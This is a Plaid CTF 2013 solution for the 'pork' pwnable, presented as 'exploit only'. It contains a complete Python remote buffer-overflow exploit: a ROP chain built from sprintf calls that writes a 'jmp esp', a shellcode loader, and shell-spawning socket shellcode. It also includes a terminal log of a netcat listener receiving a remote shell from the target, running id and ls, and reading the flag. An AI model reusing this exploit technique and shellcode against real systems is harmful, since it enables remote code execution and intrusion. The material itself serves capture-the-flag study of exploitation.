Plaid CTF 2013 - pork (Exploit only)
Category : Pwnables
|
pork-8c2fdf93e211c7358e0192a24bc951843da672b1Summary : simple remote buffer overflow
Exploit
#!/usr/bin/python from socket import * from struct import pack HOST = "184.72.73.160" PORT = 33227 shellcode_loader= "\x33\xc0\x33\xd2\x31\xdb\x42\xc1\xe2\x08\x43\x43\x43\x43\x04\x03\x54\x59\x81\xc1\x10\xfe\xff\xff\xcd\x80\x3c\x02\x7e\x02\xff\xe1\x31\xc0\x40\x89\xc3\xcd\x80" # read(4, buf, 0x100) -> buf(); SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" p = lambda x: pack("<L", x) freespace = 0x0804ac12 format_string = 0x08049ab5 # string "%s" sprintf_plt = 0x0804887C pppr = 0x08048B3F payload = "" payload += "a"*0x400 payload += p(pppr) payload += p(0xdeadbeef) # arg 1 payload += p(0x0804931b) # arg 2 payload += p(0x0804931b) # arg 3 payload += p(sprintf_plt) payload += p(pppr) payload += p(freespace) payload += p(format_string) payload += p(0x08048abb) # byte "\xff" payload += p(sprintf_plt) payload += p(pppr) payload += p(freespace+1) payload += p(format_string) payload += p(0x08048c79) # byte "\xe4" payload += p(freespace) # byte "\xff\xe4" // jmp esp payload += shellcode_loader s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) s.send("GET http://"+payload+".com/ HTTP/1.0\n") raw_input(">") s.send("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n") raw_input(">") s.send(SHELLCODE) s.close() |
root@ubuntu:~/pork# ./exploit.py > > --------------------------------------------------------------------- root@ubuntu:~# nc -lv 31337 Connection from 184.72.73.160 port 31337 [tcp/*] accepted id uid=1001(pork) gid=1001(pork) groups=1001(pork) ls flag pork cat flag http_m3ans_w3b_amirite |